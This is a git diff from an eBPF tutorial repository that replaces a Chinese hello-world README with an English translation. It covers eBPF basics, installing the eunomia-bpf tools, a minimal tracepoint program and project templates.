on traditional tools like BCC, we will use modern frameworks such as `libbpf`, `Cilium`, `libbpf-rs`, and eunomia-bpf, with examples provided in `C`, `Go`, and `Rust`. - -The primary goal of this tutorial is to provide clear and concise examples of eBPF tools (starting with as little as 20 lines of code!) to help developers quickly grasp essential eBPF development techniques. Each example is self-contained and can be found in the directory structure, with every directory representing an independent eBPF tool. You can also visit our tutorial code repository or website for more examples and complete tutorial source code. - -## Introduction to eBPF: Secure and Efficient Kernel Extension - -eBPF (extended Berkeley Packet Filter) is a groundbreaking technology that allows developers to run small programs directly in kernel space, safely and efficiently. Unlike traditional approaches that required modifying kernel source code or loading new modules, eBPF made it possible to customize and optimize network behavior dynamically, all without disrupting system operations. This flexibility and efficiency made eBPF a pivotal technology for overcoming the limitations of traditional networking stacks. - -### What Makes eBPF So Powerful? - -- **Direct Kernel Interaction:** eBPF programs execute within the kernel, interacting with system-level events such as network packets, system calls, or tracepoints. -- **Safe Execution:** eBPF ensures safety through a verifier that checks the logic of the program before it runs, preventing potential kernel crashes or security breaches. -- **Minimal Overhead:** eBPF achieves near-native execution speed by employing a Just-In-Time (JIT) compiler, which translates eBPF bytecode into optimized machine code for the specific architecture. - -## eBPF: Past, Present, and Future - -### Past: Programmable Networking Transformed - -When eBPF was introduced in 2014, it revolutionized how developers approached networking by allowing small, programmable kernel-space applications to handle packet processing in real time. By hooking into key kernel points, eBPF enabled custom logic to be applied whenever a network packet arrived, leading to higher efficiency and flexibility. This allowed organizations to tailor networking behavior without the overhead of custom drivers or kernel modifications, creating an ideal solution for cloud-native and data-center environments. -### Present: A Versatile Framework for Modern Computing Needs - -eBPF has evolved into a versatile framework that extends beyond its original purpose of networking, now encompassing observability, tracing, security, and even system resource management. eBPF programs can dynamically hook into kernel events, giving developers precise control over system behavior and performance optimization without requiring kernel modifications or reboots. This makes eBPF an essential tool for system administrators and developers who aim to monitor, optimize, and secure their environments. - -Here are some key areas where eBPF is widely used today: - -- **Networking:** eBPF offers real-time, high-speed packet filtering and processing within the kernel, allowing for the creation of custom protocol parsers and network policies without needing new drivers or system restarts. This enables highly efficient network management in cloud and data center environments. - -- **Observability:** eBPF enables developers to gather detailed insights into system behavior by collecting custom metrics and performing in-kernel data aggregation. By tapping into kernel tracepoints and function calls, eBPF helps identify performance issues and track down elusive bugs. - -- **Tracing & Profiling:** eBPF provides powerful tracing and profiling capabilities by attaching to kernel functions, tracepoints, and even user-space probes. This allows developers to gain deep insights into system and application behavior, enabling them to optimize performance and resolve complex system issues. - -- **Security:** eBPF plays a vital role in real-time security monitoring. It enables deep inspection of system calls, network traffic, and other kernel activities, helping to enforce dynamic security policies and detect anomalous behavior, providing an efficient way to safeguard infrastructure. - -- **Scheduler Optimization:** eBPF is increasingly used to enhance CPU scheduling, offering the ability to monitor CPU load and optimize how tasks are distributed across cores. This can lead to more efficient use of CPU resources and improved system responsiveness. - -- **HID (Human Interface Device) Driver Enhancements:** Developers use eBPF to optimize HID drivers for devices like keyboards, mice, and touchscreens. By adding custom logic for handling input events, eBPF improves responsiveness in latency-sensitive applications. - -Organizations across industries have adopted eBPF at scale: - -- **Google:** Uses eBPF for security auditing, packet processing, real-time performance monitoring, and optimizing CPU scheduling across its vast infrastructure. -- **Netflix:** Leverages eBPF for network traffic analysis, ensuring high availability and performance for streaming services. -- **Android:** Applies eBPF to optimize network usage, power consumption, and resource allocation, improving performance and battery life on millions of devices. -- **S&P Global:** Utilizes eBPF through **Cilium** for managing networking across multiple clouds and on-premises systems, ensuring scalability and security. -- **Shopify:** Implements eBPF with **Falco** for intrusion detection, bolstering security on its e-commerce platform. -- **Cloudflare:** Uses eBPF for network observability, security monitoring, and performance optimization, protecting millions of websites globally. - -eBPF's ability to dynamically adjust system behavior and extend into user space makes it an essential technology for modern computing. Whether it's optimizing network traffic, improving security, or enhancing system performance, eBPF enables developers to address real-time requirements efficiently and safely. - -In addition to its kernel-mode runtime, eBPF can also be extended to user space. For example, [bpftime](https://github.com/eunomia-bpf/bpftime), a user-space eBPF runtime, allows for higher-performance tracing, performance analysis, and plugin support in user-space applications. This extension of eBPF into user space helps improve flexibility and performance in various use cases that go beyond kernel-level tasks. - -### Future: The Expanding Potential of eBPF - -Looking forward, eBPF is expected to become an even more integral part of operating systems. The focus is on improving its flexibility, modularity, and ease of use, making it accessible for an even broader range of applications. Innovations in memory management, concurrency mechanisms, and better integration with user-space applications are on the horizon. Projects are already underway to compile significant parts of the Linux kernel to the BPF instruction set, potentially revolutionizing how kernel development and analysis are performed. - -Advancements such as dynamic stacks, better observability tools for user space (e.g., Fast Uprobes and language-specific stack walkers), and safer program termination mechanisms will continue to strengthen eBPF’s reliability and expand its use cases. Additionally, new tools and libraries will simplify eBPF development, lowering the barrier to entry for both kernel and application developers. - -## Getting Started with the Tutorial - -This tutorial provides practical eBPF development practices, covering topics from beginner to advanced levels. We focus on hands-on examples in areas like observability, networking, and security, using frameworks like `libbpf`, `libbpf-rs`, and `eunomia-bpf`, with examples in C, Go, and Rust. - -### Who Is This Tutorial For? - -- **Developers** looking to implement custom kernel solutions. -- **System Administrators** aiming to enhance performance and security. -- **Tech Enthusiasts** exploring cutting-edge kernel technologies. - -### What Will You Learn? - -- **Core Concepts:** eBPF fundamentals and integration with the Linux kernel. -- **Practical Skills:** Writing and deploying eBPF programs. -- **Advanced Topics:** Exploring security, tracing, and future innovations in eBPF. - ---- - -## Table of Contents - -1. **Introduction to eBPF** - Basic concepts and the tools you need to get started. - -2. **Beginner Examples** - Simple programs such as "Hello World" and basic tracing using kprobe and uprobe. - -3. **Observability** - Examples focused on monitoring network traffic, file operations, and process behavior using eBPF. - -4. **Networking** - Examples focused on modifying and optimizing network traffic, such as XDP, TC, and socket. - -5. **Security** - Programs for hiding process and files, sending signals to kill process, and tracking process events for security. - -6. **Advanced Use Cases** - Complex examples involving performance profiling, scheduler optimization, and eBPF in user space (e.g., bpftime). - -7. **In-Depth Topics** - Exploring eBPF for Android, using eBPF for network acceleration, and securing systems through syscall modifications. - -## How to Use eBPF Programming - -Writing eBPF programs from scratch can be complex. To simplify this, LLVM introduced the ability to compile high-level language code into eBPF bytecode in 2015. The eBPF community has since built libraries like `libbpf` to manage these programs. These libraries help load eBPF bytecode into the kernel and perform essential tasks. The Linux kernel source contains numerous eBPF examples in the `samples/bpf/` directory. - -A typical eBPF program involves two parts: kernel space code (`*_kern.c`) and user space code (`*_user.c`). The kernel space code defines the logic, while the user space code manages loading and interacting with the kernel. However, tools like `libbpf-bootstrap` and the Go eBPF library help simplify this process, allowing for one-time compilation and easier development. - -### Tools for eBPF Development - -- **BCC**: A Python-based toolchain that simplifies writing, compiling, and loading eBPF programs. It offers many pre-built tracing tools but has limitations with dependencies and compatibility. -- **eBPF Go Library**: A Go library that decouples the process of obtaining eBPF bytecode from the loading and management of eBPF programs. -- **libbpf-bootstrap**: A modern scaffold based on `libbpf` that provides an efficient workflow for writing eBPF programs, offering a simple one-time compilation process for reusable bytecode. -- **eunomia-bpf**: A toolchain for writing eBPF programs with only kernel space code. It simplifies the development of eBPF programs by dynamically loading them. - -These tools help reduce the complexity of developing eBPF programs, making the process more accessible to developers aiming to optimize system performance, security, and observability. - -## Some Tips on Learning eBPF Development - -This article will not provide a more detailed introduction to the principles of eBPF, but here is a learning plan and reference materials that may be of value: - -### Introduction to eBPF (5-7h) - -- Google or other search engines: eBPF -- Ask ChatGPT-like things: What is eBPF? - -Recommended: - -- Read the introduction to ebpf: (30min) -- Briefly understand the ebpf kernel-related documentation: (Know where to queries for tech details, 30min) - -Answer three questions: - -1. Understand what eBPF is? Why do we need it? Can't we use kernel modules? -2. What functions does it have? What can it do in the Linux kernel? What are the types of eBPF programs and helpers (not all of them need to be known, but need to know where to find them)? -3. What can it be used for? For example, in which scenarios can it be used? Networking, security, observability? - -### Understand how to develop eBPF programs (10-15h) - -Understand and try eBPF development frameworks: - -- bpftrace tutorial: (Try it,1h) -- Examples of developing various tools with BCC: (Run through, 3-4h) -- Some examples of libbpf: (Run any interesting one and read the source code, 2h) -- Tutorials: (Read part 1-10, 3-4h) - -Other development frameworks: Go or Rust language, please search and try on your own (0-2h) - -Have questions or things you want to know, whether or not they are related to this project, you can start discussing in the discussions of this project. - -Answer some questions and try some experiments (2-5h): - -1. How to develop the simplest eBPF program? -2. How to trace a kernel feature or function with eBPF? There are many ways, provide corresponding code examples; -3. What are the solutions for communication between user mode and kernel mode? How to send information from user mode to kernel mode? How to pass information from kernel mode to user mode? Provide code examples; -4. Write your own eBPF program to implement a feature; -5. In the entire lifecycle of an eBPF program, what does it do in user mode and kernel mode? - -## References - -- eBPF Introduction: -- BPF Compiler Collection (BCC): -- eunomia-bpf: - -You can also visit our tutorial code repository or website for more examples and complete tutorial source code. All content is open source. We will continue to share more content about eBPF development practices to help you better understand and master eBPF technology.". diff --git a/src/1-helloworld/README.md b/src/1-helloworld/README.md index 0d5e018..a94181a 100644 --- a/src/1-helloworld/README.md +++ b/src/1-helloworld/README.md @@ -1,47 +1,47 @@ -# eBPF 入门开发实践教程一:Hello World,基本框架和开发流程 +# eBPF Tutorial by Example 1: Hello World, Framework and Development -在本篇博客中,我们将深入探讨eBPF(Extended Berkeley Packet Filter)的基本框架和开发流程。eBPF是一种在Linux内核上运行的强大网络和性能分析工具,它为开发者提供了在内核运行时动态加载、更新和运行用户定义代码的能力。这使得开发者可以实现高效、安全的内核级别的网络监控、性能分析和故障排查等功能。 +In this blog post, we will delve into the basic framework and development process of eBPF (Extended Berkeley Packet Filter). eBPF is a powerful network and performance analysis tool that runs on the Linux kernel, providing developers with the ability to dynamically load, update, and run user-defined code at kernel runtime. This enables developers to implement efficient, secure kernel-level network monitoring, performance analysis, and troubleshooting functionalities. -本文是eBPF入门开发实践教程的第二篇,我们将重点关注如何编写一个简单的eBPF程序,并通过实际例子演示整个开发流程。在阅读本教程之前,建议您先学习第一篇教程,以便对eBPF的基本概念有个大致的了解。 +This article is the second part of the eBPF Tutorial by Example, where we will focus on how to write a simple eBPF program and demonstrate the entire development process through practical examples. Before reading this tutorial, it is recommended that you first learn the concepts of eBPF by studying the first tutorial. -在开发eBPF程序时,有多种开发框架可供选择,如 BCC(BPF Compiler Collection)libbpf、cilium/ebpf、eunomia-bpf 等。虽然不同工具的特点各异,但它们的基本开发流程大致相同。在接下来的内容中,我们将深入了解这些流程,并以 Hello World 程序为例,带领读者逐步掌握eBPF开发的基本技巧。 +When developing eBPF programs, there are multiple development frameworks to choose from, such as BCC (BPF Compiler Collection) libbpf, cilium/ebpf, eunomia-bpf, etc. Although these tools have different characteristics, their basic development process is similar. In the following content, we will delve into these processes and use the Hello World program as an example to guide readers in mastering the basic skills of eBPF development. -本教程将帮助您了解eBPF程序的基本结构、编译和加载过程、用户空间与内核空间的交互方式以及调试与优化技巧。通过学习本教程,您将掌握eBPF开发的基本知识,并为后续进一步学习和实践奠定坚实的基础。 +This tutorial will help you understand the basic structure of eBPF programs, the compilation and loading process, the interaction between user space and kernel space, as well as debugging and optimization techniques. By studying this tutorial, you will master the basic knowledge of eBPF development and lay a solid foundation for further learning and practice. -## eBPF开发环境准备与基本开发流程 +## Preparation of eBPF Development Environment and Basic Development Process -在开始编写eBPF程序之前,我们需要准备一个合适的开发环境,并了解eBPF程序的基本开发流程。本部分将详细介绍这些内容。 +Before starting to write eBPF programs, we need to prepare a suitable development environment and understand the basic development process of eBPF programs. This section will provide a detailed introduction to these subjects. -### 安装必要的软件和工具 +### Installing the necessary software and tools -要开发eBPF程序,您需要安装以下软件和工具: +To develop eBPF programs, you need to install the following software and tools: -- Linux 内核:由于eBPF是内核技术,因此您需要具备较新版本的Linux内核(至少 4.8 及以上版本,建议至少在 5.15 以上),以支持eBPF功能。 - - 建议使用最新的 Ubuntu 版本(例如 Ubuntu 23.10)以获得最佳的学习体验,较旧的内核 eBPF 功能支持可能相对不全。 -- LLVM 和 Clang:这些工具用于编译eBPF程序。安装最新版本的LLVM和Clang可以确保您获得最佳的eBPF支持。 +- Linux kernel: Since eBPF is a kernel technology, you need to have a relatively new version of the Linux kernel (minimum version 4.8 and above, suggested version is 5.15+ or 6.2+) to support eBPF functionality. + - If possible, install a new version of Ubuntu (e.g. 23.10) would be better. +- LLVM and Clang: These tools are used to compile eBPF programs. Installing the latest version of LLVM and Clang ensures that you get the best eBPF support. -eBPF 程序主要由两部分构成:内核态部分和用户态部分。内核态部分包含 eBPF 程序的实际逻辑,用户态部分负责加载、运行和监控内核态程序。 +An eBPF program consists of two main parts: the kernel space part and the user space part. The kernel space part contains the actual logic of the eBPF program, while the user space part is responsible for loading, running, and monitoring the kernel space program. -当您选择了合适的开发框架后,如BCC(BPF Compiler Collection)、libbpf、cilium/ebpf或eunomia-bpf等,您可以开始进行用户态和内核态程序的开发。以BCC工具为例,我们将介绍eBPF程序的基本开发流程: +Once you have chosen a suitable development framework, such as BCC (BPF Compiler Collection), libbpf, cilium/ebpf, or eunomia-bpf, you can begin developing the user space and kernel space programs. Taking the BCC tool as an example, we will introduce the basic development process of eBPF programs: -1. 安装BCC工具:根据您的Linux发行版,按照BCC官方文档的指南安装BCC工具和相关依赖。 -2. 编写eBPF程序(C语言):使用C语言编写一个简单的eBPF程序,例如Hello World程序。该程序可以在内核空间执行并完成特定任务,如统计网络数据包数量。 -3. 编写用户态程序(Python或C等):使用Python、C等语言编写用户态程序,用于加载、运行eBPF程序以及与之交互。在这个程序中,您需要使用BCC提供的API来加载和操作内核态的eBPF程序。 -4. 编译eBPF程序:使用BCC工具,将C语言编写的eBPF程序编译成内核可以执行的字节码。BCC会在运行时动态从源码编译eBPF程序。 -5. 加载并运行eBPF程序:在用户态程序中,使用BCC提供的API加载编译好的eBPF程序到内核空间,然后运行该程序。 -6. 与eBPF程序交互:用户态程序通过BCC提供的API与eBPF程序交互,实现数据收集、分析和展示等功能。例如,您可以使用BCC API读取eBPF程序中的map数据,以获取网络数据包统计信息。 -7. 卸载eBPF程序:当不再需要eBPF程序时,用户态程序应使用BCC API将其从内核空间卸载。 -8. 调试与优化:使用 bpftool 等工具进行eBPF程序的调试和优化,提高程序性能和稳定性。 +1. Installing the BCC tool: Depending on your Linux distribution, follow the guidelines in the BCC documentation to install the BCC tool and its dependencies. +2. Writing an eBPF program (C language): Use the C language to write a simple eBPF program, such as the Hello World program. This program can be executed in kernel space and perform specific tasks, such as counting network packets. +3. Writing a user space program (Python or C, etc.): Use languages like Python or C to write a user space program that is responsible for loading, running, and interacting with the eBPF program. In this program, you need to use the API provided by BCC to load and manipulate the kernel space eBPF program. +4. Compiling the eBPF program: Use the BCC tool to compile the eBPF program written in C language into bytecode that can be executed by the kernel. BCC dynamically compiles the eBPF program from source code at runtime. +5. Loading and running the eBPF program: In the user space program, use the API provided by BCC to load the compiled eBPF program into kernel space and then run it. +6. Interacting with the eBPF program: The user space program interacts with the eBPF program through the API provided by BCC, implementing data collection, analysis, and display functions. For example, you can use the BCC API to read map data in the eBPF program to obtain network packet statistics. +7. Unloading the eBPF program: When the eBPF program is no longer needed, the user space program should unload it from the kernel space using the BCC API. +8. Debugging and optimization: Use tools like bpftool to debug and optimize eBPF programs, improving program performance and stability. -通过以上流程,您可以使用BCC工具开发、编译、运行和调试eBPF程序。请注意,其他框架(如libbpf、cilium/ebpf和eunomia-bpf)的开发流程大致相似但略有不同,因此在选择框架时,请参考相应的官方文档和示例。 +Through the above process, you can develop, compile, run, and debug eBPF programs using the BCC tool. Note that the development process of other frameworks, such as libbpf, cilium/ebpf, and eunomia-bpf, is similar but slightly different. Therefore, when choosing a framework, please refer to the respective official documentation and examples. -通过这个过程,你可以开发出一个能够在内核中运行的 eBPF 程序。eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。它基于 libbpf 的 CO-RE 轻量级开发框架,支持通过用户态 WASM 虚拟机控制 eBPF 程序的加载和执行,并将预编译的 eBPF 程序打包为通用的 JSON 或 WASM 模块进行分发。我们会使用 eunomia-bpf 进行演示。 +By following this process, you can develop an eBPF program that runs in the kernel. eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain. It aims to simplify the development, building, distribution, and running of eBPF programs. It is based on the libbpf CO-RE lightweight development framework, supports loading and executing eBPF programs through a user space WebAssembly (WASM) virtual machine, and packages precompiled eBPF programs into universal JSON or WASM modules for distribution. We will use eunomia-bpf for demonstration purposes. -## 下载安装 eunomia-bpf 开发工具 +## Download and Install eunomia-bpf Development Tools -可以通过以下步骤下载和安装 eunomia-bpf: +You can download and install eunomia-bpf using the following steps: -下载 ecli 工具,用于运行 eBPF 程序: +Download the ecli tool for running eBPF programs: ```console $ wget https://aka.pw/bpf-ecli -O ecli && chmod +x ./ecli @@ -49,21 +49,22 @@ $ ./ecli -h Usage: ecli [--help] [--version] [--json] [--no-cache] url-and-args ``` -下载编译器工具链,用于将 eBPF 内核代码编译为 config 文件或 WASM 模块: +Download the compiler toolchain for compiling eBPF kernel code into config files or WASM modules: ```console $ wget https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc && chmod +x ./ecc $ ./ecc -h eunomia-bpf compiler Usage: ecc [OPTIONS] [EXPORT_EVENT_HEADER] +.... ``` -注:假如在 aarch64 平台上,请从 release 下载 [ecc-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc-aarch64) 和 [ecli-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecli-aarch64). +Note: If you are on the aarch64 platform, please use the [ecc-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc-aarch64) and [ecli-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecli-aarch64). -也可以使用 docker 镜像进行编译: +You can also compile using the docker image: ```console -$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # 使用 docker 进行编译。`pwd` 应该包含 *.bpf.c 文件和 *.h 文件。 +$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # Compile using docker. `pwd` should contain *.bpf.c files and *.h files. export PATH=PATH:~/.eunomia/bin Compiling bpf object... Packing ebpf object and config into /src/package.json... @@ -71,7 +72,7 @@ Packing ebpf object and config into /src/package.json... ## Hello World - minimal eBPF program -我们会先从一个简单的 eBPF 程序开始,它会在内核中打印一条消息。我们会使用 eunomia-bpf 的编译器工具链将其编译为 bpf 字节码文件,然后使用 ecli 工具加载并运行该程序。作为示例,我们可以暂时省略用户态程序的部分。 +We will start with a simple eBPF program that prints a message in the kernel. We will use the eunomia-bpf compiler toolchain to compile it into a BPF bytecode file, and then load and run the program using the ecli tool. For the sake of the example, we can temporarily disregard the user space program. ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -97,19 +98,19 @@ int handle_tp(void *ctx) } ``` -这段程序通过定义一个 handle_tp 函数并使用 SEC 宏把它附加到 sys_enter_write tracepoint(即在进入 write 系统调用时执行)。该函数通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 write 系统调用的进程 ID,并在内核日志中打印出来。 +This program defines a handle_tp function and attaches it to the sys_enter_write tracepoint using the SEC macro (i.e., it is executed when the write system call is entered). The function retrieves the process ID of the write system call invocation using the bpf_get_current_pid_tgid and bpf_printk functions, and prints it in the kernel log. -- `bpf_printk()`: 一种将信息输出到trace_pipe(/sys/kernel/debug/tracing/trace_pipe)简单机制。 在一些简单用例中这样使用没有问题, but它也有一些限制:最多3 参数; 第一个参数必须是%s(即字符串);同时trace_pipe在内核中全局共享,其他并行使用trace_pipe的程序有可能会将 trace_pipe 的输出扰乱。 一个更好的方式是通过 BPF_PERF_OUTPUT(), 稍后将会讲到。 -- `void *ctx`:ctx本来是具体类型的参数, 但是由于我们这里没有使用这个参数,因此就将其写成void *类型。 -- `return 0`;:必须这样,返回0 (如果要知道why, 参考 #139 )。 +- `bpf_trace_printk()`: A simple mechanism to output information to the trace_pipe (/sys/kernel/debug/tracing/trace_pipe). This is fine for simple use cases, but it has limitations: a maximum of 3 parameters; the first parameter must be %s (i.e., a string); and the trace_pipe is globally shared in the kernel, so other programs using the trace_pipe concurrently might disrupt its output. A better approach is to use BPF_PERF_OUTPUT(), which will be discussed later. +- `void *ctx`: ctx is originally a parameter of a specific type, but since it is not used here, it is written as void *. +- `return 0;`: This is necessary, returning 0 (to know why, refer to #139 ). -要编译和运行这段程序,可以使用 ecc 工具和 ecli 命令。首先在 Ubuntu/Debian 上,执行以下命令: +To compile and run this program, you can use the ecc tool and ecli command. First, on Ubuntu/Debian, execute the following command: ```shell sudo apt install clang llvm ``` -使用 ecc 编译程序: +Compile the program using ecc: ```console $ ./ecc minimal.bpf.c @@ -117,20 +118,20 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -或使用 docker 镜像进行编译: +Or compile using a docker image: ```shell docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -然后使用 ecli 运行编译后的程序: +Then run the compiled program using ecli: ```console $ sudo ./ecli run package.json Running eBPF program... ``` -运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: +After running this program, you can view the output of the eBPF program by checking the /sys/kernel/debug/tracing/trace_pipe file: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_write" @@ -138,60 +139,57 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_ <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. ``` -按 Ctrl+C 停止 ecli 进程之后,可以看到对应的输出也停止。 +Once you stop the ecli process by pressing Ctrl+C, the corresponding output will also stop. -注意:如果正在使用的 Linux 发行版(例如 Ubuntu )默认情况下没有启用跟踪子系统可能看不到任何输出,使用以下指令打开这个功能: +Note: If your Linux distribution (e.g. Ubuntu) does not have the tracing subsystem enabled by default, you may not see any output. Use the following command to enable this feature: ```console $ sudo su # echo 1 > /sys/kernel/debug/tracing/tracing_on ``` -## eBPF 程序的基本框架 +## Basic Framework of eBPF Program -如上所述, eBPF 程序的基本框架包括: +As mentioned above, the basic framework of an eBPF program includes: -- 包含头文件:需要包含 等头文件。 -- 定义许可证:需要定义许可证,通常使用 "Dual BSD/GPL"。 -- 定义 BPF 函数:需要定义一个 BPF 函数,例如其名称为 handle_tp,其参数为 void *ctx,返回值为 int。通常用 C 语言编写。 -- 使用 BPF 助手函数:在例如 BPF 函数中,可以使用 BPF 助手函数 bpf_get_current_pid_tgid() 和 bpf_printk()。 -- 返回值 +- Including header files: You need to include and header files, among others. +- Defining a license: You need to define a license, typically using "Dual BSD/GPL". +- Defining a BPF function: You need to define a BPF function, for example, named handle_tp, which takes void *ctx as a parameter and returns int. This is usually written in the C language. +- Using BPF helper functions: In the BPF function, you can use BPF helper functions such as bpf_get_current_pid_tgid() and bpf_printk(). +- Return value -## tracepoints +## Tracepoints -跟踪点(tracepoints)是内核静态插桩技术,在技术上只是放置在内核源代码中的跟踪函数,实际上就是在源码中插入的一些带有控制条件的探测点,这些探测点允许事后再添加处理函数。比如在内核中,最常见的静态跟踪方法就是 printk,即输出日志。又比如:在系统调用、调度程序事件、文件系统操作和磁盘 I/O 的开始和结束时都有跟踪点。跟踪点于 2009 年在 Linux 2.6.32 版本中首次提供。跟踪点是一种稳定的 API,数量有限。 +Tracepoints are a kernel static instrumentation technique, technically just trace functions placed in the kernel source code, which are essentially probe points with control conditions inserted into the source code, allowing post-processing with additional processing functions. For example, the most common static tracing method in the kernel is printk, which outputs log messages. For example, there are tracepoints at the start and end of system calls, scheduler events, file system operations, and disk I/O. Tracepoints were first introduced in Linux version 2.6.32 in 2009. Tracepoints are a stable API and their number is limited. -## GitHub 模板:轻松构建 eBPF 项目和开发环境 +## GitHub Templates: Build eBPF Projects and Development Environments Easily -面对创建一个 eBPF 项目,您是否对如何开始搭建环境以及选择编程语言感到困惑?别担心,我们为您准备了一系列 GitHub 模板,以便您快速启动一个全新的eBPF项目。只需在GitHub上点击 `Use this template` 按钮,即可开始使用。 +When faced with creating an eBPF project, are you confused about how to set up the environment and choose a programming language? Don't worry, we have prepared a series of GitHub templates to help you quickly start a brand new eBPF project. Just click the `Use this template` button on GitHub to get started. -- :基于C语言和 libbpf 框架的eBPF项目模板 -- :基于Go语言和cilium/ebpf框架的eBPF项目模板 -- :基于Rust语言和libbpf-rs框架的eBPF项目模板 -- :基于C语言和eunomia-bpf框架的eBPF项目模板 +- : eBPF project template based on the C language and libbpf framework. +- : eBPF project template based on the Go language and cilium/ebpf framework. +- : eBPF project template based on the Rust language and libbpf-rs framework. +- : eBPF project template based on the C language and eunomia-bpf framework. -这些启动模板包含以下功能: +These starter templates include the following features: -- 一个 Makefile,让您可以一键构建项目 -- 一个 Dockerfile,用于为您的 eBPF 项目自动创建一个容器化环境并发布到 Github Packages -- GitHub Actions,用于自动化构建、测试和发布流程 -- eBPF 开发所需的所有依赖项 +- A Makefile for building the project with one command. +- A Dockerfile for automatically creating a containerized environment for your eBPF project and publishing it to Github Packages.- GitHub Actions, used for automating build, test, and release processes +- All dependencies required for eBPF development -> 通过将现有仓库设置为模板,您和其他人可以快速生成具有相同基础结构的新仓库,从而省去了手动创建和配置的繁琐过程。借助 GitHub 模板仓库,开发者可以专注于项目的核心功能和逻辑,而无需为基础设置和结构浪费时间。更多关于模板仓库的信息,请参阅官方文档: +> By setting an existing repository as a template, you and others can quickly generate new repositories with the same underlying structure, eliminating the tedious process of manual creation and configuration. With GitHub template repositories, developers can focus on the core functionality and logic of their projects without wasting time on setup and structure. For more information about template repositories, please refer to the official documentation: -## 总结 +## Summary -eBPF 程序的开发和使用流程可以概括为如下几个步骤: +The development and usage process of eBPF programs can be summarized in the following steps: -- 定义 eBPF 程序的接口和类型:这包括定义 eBPF 程序的接口函数,定义和实现 eBPF 内核映射(maps)和共享内存(perf events),以及定义和使用 eBPF 内核帮助函数(helpers)。 -- 编写 eBPF 程序的代码:这包括编写 eBPF 程序的主要逻辑,实现 eBPF 内核映射的读写操作,以及使用 eBPF 内核帮助函数。 -- 编译 eBPF 程序:这包括使用 eBPF 编译器(例如 clang)将 eBPF 程序代码编译为 eBPF 字节码,并生成可执行的 eBPF 内核模块。ecc 本质上也是调用 clang 编译器来编译 eBPF 程序。 -- 加载 eBPF 程序到内核:这包括将编译好的 eBPF 内核模块加载到 Linux 内核中,并将 eBPF 程序附加到指定的内核事件上。 -- 使用 eBPF 程序:这包括监测 eBPF 程序的运行情况,并使用 eBPF 内核映射和共享内存进行数据交换和共享。 -- 在实际开发中,还可能需要进行其他的步骤,例如配置编译和加载参数,管理 eBPF 内核模块和内核映射,以及使用其他高级功能等。 +- Define the interface and types of eBPF programs: This includes defining the interface functions of eBPF programs, defining and implementing eBPF kernel maps and shared memory (perf events), and defining and using eBPF kernel helper functions. +- Write the code for eBPF programs: This includes writing the main logic of the eBPF program, implementing read and write operations on eBPF kernel maps, and using eBPF kernel helper functions. +- Compile the eBPF program: This includes using an eBPF compiler (such as clang) to compile the eBPF program code into eBPF bytecode and generate an executable eBPF kernel module. ecc essentially calls the clang compiler to compile eBPF programs. +- Load the eBPF program into the kernel: This includes loading the compiled eBPF kernel module into the Linux kernel and attaching the eBPF program to the specified kernel events. +- Use the eBPF program: This includes monitoring the execution of the eBPF program and exchanging and sharing data using eBPF kernel maps and shared memory. +- In practical development, there may be additional steps such as configuring compilation and loading parameters, managing eBPF kernel modules and kernel maps, and using other advanced features. -需要注意的是,BPF 程序的执行是在内核空间进行的,因此需要使用特殊的工具和技术来编写、编译和调试 BPF 程序。eunomia-bpf 是一个开源的 BPF 编译器和工具包,它可以帮助开发者快速和简单地编写和运行 BPF 程序。 +It should be noted that the execution of BPF programs occurs in the kernel space, so special tools and techniques are needed to write, compile, and debug BPF programs. eunomia-bpf is an open-source BPF compiler and toolkit that can help developers write and run BPF programs quickly and easily. -您还可以访问我们的教程代码仓库 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 - -> 原文地址: 转载请注明出处。 +You can also visit our tutorial code repository or website or website for more examples and complete tutorials, all of which are open-source. We will continue to share more about eBPF development practices to help you better understand and master eBPF technology. diff --git a/src/1-helloworld/README.zh.md b/src/1-helloworld/README.zh.md new file mode 100644 index 0000000..0d5e018 --- /dev/null +++ b/src/1-helloworld/README.zh.md @@ -0,0 +1,197 @@ +# eBPF 入门开发实践教程一:Hello World,基本框架和开发流程 + +在本篇博客中,我们将深入探讨eBPF(Extended Berkeley Packet Filter)的基本框架和开发流程。eBPF是一种在Linux内核上运行的强大网络和性能分析工具,它为开发者提供了在内核运行时动态加载、更新和运行用户定义代码的能力。这使得开发者可以实现高效、安全的内核级别的网络监控、性能分析和故障排查等功能。 + +本文是eBPF入门开发实践教程的第二篇,我们将重点关注如何编写一个简单的eBPF程序,并通过实际例子演示整个开发流程。在阅读本教程之前,建议您先学习第一篇教程,以便对eBPF的基本概念有个大致的了解。 + +在开发eBPF程序时,有多种开发框架可供选择,如 BCC(BPF Compiler Collection)libbpf、cilium/ebpf、eunomia-bpf 等。虽然不同工具的特点各异,但它们的基本开发流程大致相同。在接下来的内容中,我们将深入了解这些流程,并以 Hello World 程序为例,带领读者逐步掌握eBPF开发的基本技巧。 + +本教程将帮助您了解eBPF程序的基本结构、编译和加载过程、用户空间与内核空间的交互方式以及调试与优化技巧。通过学习本教程,您将掌握eBPF开发的基本知识,并为后续进一步学习和实践奠定坚实的基础。 + +## eBPF开发环境准备与基本开发流程 + 